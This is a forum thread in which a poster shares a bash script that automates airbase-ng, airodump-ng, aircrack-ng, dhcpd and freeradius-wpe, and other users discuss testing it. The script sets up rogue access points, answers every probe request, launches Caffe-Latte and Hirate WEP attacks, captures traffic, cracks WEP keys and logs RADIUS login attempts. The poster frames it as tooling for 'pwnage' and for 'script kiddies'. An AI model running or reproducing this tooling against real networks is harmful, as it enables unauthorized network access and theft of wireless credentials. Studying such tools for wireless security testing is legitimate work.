Jump to content

bash script for airbase-ng

Timmo

By Timmo
in Applications & Coding

 Share

Recommended Posts

Timmo Newbie

Timmo

Posted
Posted

hi all.

before anybody criticizes im not a big scripter and there are a lot of things i could have done with this to make it better and this is prob very buggy, hence im uploading it here.

ok i have been playing around with airbase-ng lately (from aircrack-ng svn) also using dhcpd and freeradius.

and i have started working on a script to make it easy to start the server for pwnage or just an access point.

here it is and have a look.

updated a little. please comment

#!/bin/bash
modprobe tun

DUMPPATH="capture/airbase"
debug=0


if [ "$debug" = "1" ]; then
	HOLD="-hold"
else
	HOLD=""
fi

function killdaemons {
	. /etc/rc.d/init.d/functions
	RETVAL=0
	echo -n "Shutting down dhcpd: "
	killproc dhcpd
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/dhcpd
	rm /var/state/dhcp/dhcpd.leases
	touch /var/state/dhcp/dhcpd.leases

	RETVAL=0
	echo -n "Shutting down radiusd: "
	killproc /usr/local/sbin/radiusd
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ]
	rm /usr/local/var/log/radius/radius.log
	touch /usr/local/var/log/radius/radius.log

	RETVAL=0
	echo -n "Shutting down airbase-ng: "
	killproc /usr/local/sbin/airbase-ng
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ]

	RETVAL=0
	echo -n "Shutting down xterm: "
	killproc /usr/bin/xterm
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ]
}

function captureairodump {
		xterm $HOLD -title "Capturing data on channel: $CHANNEL" -e /usr/local/sbin/airodump-ng -w $DUMPPATH $CHANNEL$CAPWIFI
}

function airbasefunc {
	xterm $HOLD -title "running airbase-ng" -e $command
}

function dhcpfunc {
	ifconfig at0 192.168.0.1 netmask 255.255.255.0
	echo -n "Starting dhcpd: "
	daemon /usr/sbin/dhcpd at0
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ] && touch /var/lock/subsys/dhcpd
	xterm $HOLD -title "tail DHCP leases" -e tail -f /var/state/dhcp/dhcpd.leases
}

function radiusdfunc {
	/usr/local/sbin/radiusd -i 192.168.0.1 -p 1812
	xterm $HOLD -title "tail radiusd log file" -e tail -f /usr/local/var/log/radius/radius.log &
	xterm $HOLD -title "tail radiusd other files" -e tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
}

function aircrackfunc {
	xterm $HOLD -title "cracking wep key" -e /usr/local/bin/aircrack-ng $DUMPPATH*.cap
}

function setbasicAP {
	echo select adaptor
	select INTERFACE in $INTERFACES; do
		break;
	done
	echo Set BSSID. blank for adaptor address. example 00:01:02:03:44:55
	read yz
	if [ "$yz" = "" ]; then
		BSSID=""
	else
		BSSID="-a $yz "
	fi
	echo Set channel [1]
	read yz
	if [ "$yz" = "" ]; then
		CHANNEL="-c 1 "
	else
		CHANNEL="-c $yz "
	fi
	echo Ad-Hoc mode y/[n]
	read yz
	if [ "$yz" = "y" ]; then
		ADHOC="-A "
		echo
	else
		ADHOC=""
	fi
}

function setESSID {
	echo set essid to use for AP
	read yz
	ESSID="--essid $yz "
	echo allow specific clients? y/[n]
	read yz
	if [ "$yz" = "y" ]; then
		echo "(f)ile or (s)pecified?"
		read yz
		if [ "$yz" = "f" ]; then
			echo enter path to file
			read xy
			MAC="--clients $xy "
		else
			echo enter MAC address
			read xy
			MAC="--client $xy "
		fi
	fi
}

function setfilterhack {
echo "filter ESSIDs and/or MACs. 0=skip [1=allow] 2=disallow"
read yz
case $yz in
	2 ) DISALLOW="-f disallow ";;
	0 ) SKIP="1";;
	* ) DISALLOW="";;
esac


if [ "$SKIP" = "1" ]; then
	DISALLOW=""
	MAC=""
	ESSID=""
else
	echo use MAC filtering? y/[n]
	read yz
	if [ "$yz" = "y" ]; then
		echo "(f)ile or (s)pecified?"
		read yz
		if [ "$yz" = "f" ]; then
			echo enter path to file
			read xy
			MAC="--clients $xy "
		else
			echo enter MAC address
			read xy
			MAC="--client $xy "
		fi
	fi
	echo use ESSID filtering? y/[n]
	read yz
	if [ "$yz" = "y" ]; then
		echo "(f)ile or (s)pecified?"
		read yz
		if [ "$yz" = "f" ]; then
			echo enter path to file
			read xy
			ESSID="--essids $xy "
		else
			echo enter ESSID
			read xy
			ESSID="--essid $xy "
		fi
	fi
fi
echo "respond to all probes? y/[n] (works with the filtering)"
read yz
if [ "$yz" = "y" ]; then
	ALLPROBES="-P -C 120 "
else
	ALLPROBES=""
fi
}

function hideessid {
echo hide ESSID? y/[n]
read yz
if [ "$yz" = "y" ]; then
	ESSIDHIDE="-X "
else
	ESSIDHIDE=""
fi
}

function disablebroadcast {
echo Disable responses to broadcast probes? y/[n]
read yz
if [ "$yz" = "y" ]; then
	Broadcast="-y "
else
	Broadcast=""
fi
}

function setencription {
echo set encription
echo use [0=None] 1=WEP 2=WPA1 3=WPA2 4=ALL
read yz
WepKey=""
case $yz in
	1 ) ENCRIPFLAG="-W 1 ";
		echo
		echo set wep key? [y]/n
		read xy
		if [ "$xy" = "n" ]; then
			WepKey=""
			echo
		else
			echo enter key
			read xy
			WepKey="-w $xy "
			echo
		fi;;

	2 ) echo
		echo set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
		read xy
		ENCRIPFLAG="-z $xy ";;


	3 ) echo
		echo set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
		read xy
		ENCRIPFLAG="-Z $xy ";;


	4 ) ENCRIPFLAG="-0 "
		echo
		echo set a wep key? [y]/n
		read xy
		echo
		if [ "$xy" = "n" ]; then
			WepKey=""
		else
			echo enter key
			read xy
			WepKey="-w $xy "
		fi;;

	* ) ENCRIPFLAG="";;
esac

echo
echo fake EAPOL [0=Disable] 1=MD5 2=SHA1 3=auto
read yz
case $yz in
	1 ) EAPOL="-V 1 " ;;
	2 ) EAPOL="-V 2 " ;;
	3 ) EAPOL="-V 3 " ;;
	* ) EAPOL="" ;;
esac

echo
echo force shared key authentication? y/[n]
read yz
if [ "$yz" = "y" ]; then
	FORCESK="-s "
	echo set key length. default 128
	read xy
	if [ "$xy" = "" ]; then
		SKKEYLENGTH=""
	else
		SKKEYLENGTH="-S $xy "
	fi
else
	FORCESK=""
	SKKEYLENGTH=""
fi
}

function attack {
echo Select attack
echo "0) dont attack, AP mode only. default"
echo "1) use Caffe-Latte attack"
echo "2) use cfrag (Hirate) attack"
read yz
case $yz in
	1 ) ATTACK="-L "
		USEATTACK=1;;
	2 ) ATTACK="-N "
		USEATTACK=1;;
	* ) ATTACK=""
		USEATTACK=0;;
esac
}

function debugging {
echo Print debugging info? [y]/n
read yz
if [ "$yz" = "n" ]; then
	Verbose=""
else
	Verbose="-v "
fi
}

killdaemons
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`
setbasicAP
attack

if [ "$USEATTACK" = "0" ]; then
	setESSID
	hideessid
	disablebroadcast
	setencription
else
	setfilterhack
	hideessid
	disablebroadcast
	setencription
fi
debugging


SWITCHES="$BSSID$CHANNEL$ADHOC$ENCRIPFLAG$WepKey$EAPOL$DISALLOW$MAC$ESSID$ALLPROBES$ESSIDHIDE$Broadcast$FORCESK$SKKEYLENGTH$ATTACK$Verbose$INTERFACE"
command="/usr/local/sbin/airbase-ng $SWITCHES"
echo
echo $command
echo run? [y]/n
read yz
if [ "$yz" = n ]; then exit; fi
airbasefunc &
sleep 1

echo
if [ "$USEATTACK" = "1" ]; then
	echo use airodump to capture replies? y/[n]
	read captrue
	if [ "$captrue" = "y" ]; then
		echo remove old dump files? y/[n]
		read yz
		if [ "$yx" = "y" ]; then rm $DUMPPATH*;fi
		echo "select interface (can use the same interface)"
		select CAPWIFI in $INTERFACES; do
			break;
		done
		captureairodump &
		sleep 1
	fi
fi

if [ "$captrue" = "y" ]; then
	echo run aircrack on captured packets? WEP only. y/[n]
	read yz
	if [ "$yz" = "y" ]; then
	aircrackfunc &
	sleep 1
	fi
fi

echo
echo use dhcp server? y/[n]
read yz
if [ "$yz" = "y" ]; then
	dhcpfunc &
	sleep 1
fi

echo
echo use radiusd? y/[n]
read yz
if [ "$yz" = "y" ]; then
	radiusdfunc &
	sleep 1
fi


echo
echo press enter to kill all
read asdf

killdaemons

Link to comment
Share on other sites
Timmo Newbie

Timmo

Posted
  • Author
Posted

updated the script. now has different options for AP mode or attack mode. (makes it a little easyier to setup for a script kiddy hehe)

oh and i tried to fix the long code box but couldnt find it in the short amount of time i have doing nothing at work :)

Link to comment
Share on other sites
  • 2 weeks later...
Timmo Newbie

Timmo

Posted
  • Author
Posted

*bump*

has anyone tested this yet?

it seems to work on my backtrack system but people might want to try others. and i haven't been able to get the radius part to work. been testing many situations, shared key doesn't seem to want to work either (might have been a little impatient doing this test though) what are other peoples tests like? cant get anything to work with wpa1 or wpa2 but haven't had the chance to do a lot of testing here.

Link to comment
Share on other sites
DingleBerries Newbie

DingleBerries

Posted
Posted

Just looking over the code it seems that ath0 is the hard coded network adapter, please correct me if wrong.. Maybe add an option to input your NIC, eth1 in my case.. I can edit it myself but for the skiddish it may be a bit more difficult.. Cant test it on this lappy but i will as soon as i get a chance.

Link to comment
Share on other sites
Timmo Newbie

Timmo

Posted
  • Author
Posted

After the functions have been declaired it kills the process's required (had issues with airbase-ng continuing to run after i closed out) then it comes up with a promt asking you to select your adapter. This was pulled out of the airoscript script that's on backtrack. (Will be noting this in the code later when I finish it completely)

Link to comment
Share on other sites
DingleBerries Newbie

DingleBerries

Posted
Posted
After the functions have been declaired it kills the process's required (had issues with airbase-ng continuing to run after i closed out) then it comes up with a promt asking you to select your adapter. This was pulled out of the airoscript script that's on backtrack. (Will be noting this in the code later when I finish it completely)

Awesome. I use Mint as my main distro, i do alot of pentesting legally so BackTrack is really just a fun toy for me, so will it work across multiple distros(not just slax)? I am going to the local shope today to find an atheros card(some other fun things i want to try need this) and i will test it out then...broadcom + ndiswrapper = shit. Ive copied the py and will look over it in a few, but it seems you have the hard part out of the way. Are you going to make a gui for this as well? Asked because i saw a py/gui thread.

Link to comment
Share on other sites
Timmo Newbie

Timmo

Posted
  • Author
Posted

thats the idea. creating a gui for this and open up my skills to add more into the script kiddy community. (no good at actual programing but scripting i seem to get a grasp on) did have a bit of a look at free basic as i have done work in CBM basic and VB, but comileing issues on backtrack prevented me from using this.

and the only reason i use backtrack is because i was building a really good pen test box using ubuntu 8 as the base but once the kernel was updated i thought had issues with the patched drivers i was using but turns out all drivers and chipsets except the intel one showed 0 power in airodump-ng. no good. tried linux minx, open suse all with the same error. then tried fedora compile issues so didnt even bother. the best bet atm is to stick with bt even though i dislike the kde desktop so much.

i will start looking at gui creating over the next few weeks and hopefully put this into a gui during my time off work

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...